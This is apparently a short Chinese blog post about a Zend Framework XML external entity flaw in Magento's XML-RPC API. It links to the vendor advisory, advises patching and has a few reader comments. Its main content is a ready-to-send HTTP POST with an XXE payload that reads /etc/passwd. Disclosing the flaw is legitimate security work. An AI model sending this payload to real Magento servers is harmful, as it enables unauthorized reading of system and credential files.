Magento zend框架漏洞导致读取任意文件

官方报告:http://www.magentocommerce.com/blog/comments/important-security-update-zend-platform-vulnerability


此漏洞应用截图

 

DEMO:

POST /index.php/api/xmlrpc HTTP/1.1
Host: $host

<?xml version="1.0"?>
 <!DOCTYPE foo [  
  <!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<methodCall>
  <methodName>&xxe;</methodName> 
</methodCall> 

处理:

打上补丁

本文永久地址:https://sjolzy.cn/Magento-zend-framework-of-vulnerability-to-cause-to-read-any-file.html

--EOF--

标签: magento, 漏洞

随机文章

已有 5 条评论

  1. 消灭0回复!
    喜欢python,看到博主这里也有,以后多来来

  2. 虽然看不怎么懂 但还是支持

  3. tudoutoutudoutou

    请问截图中的软件是?

    1. 是火狐的发包插件

  4. 不错。学习到了

添加新评论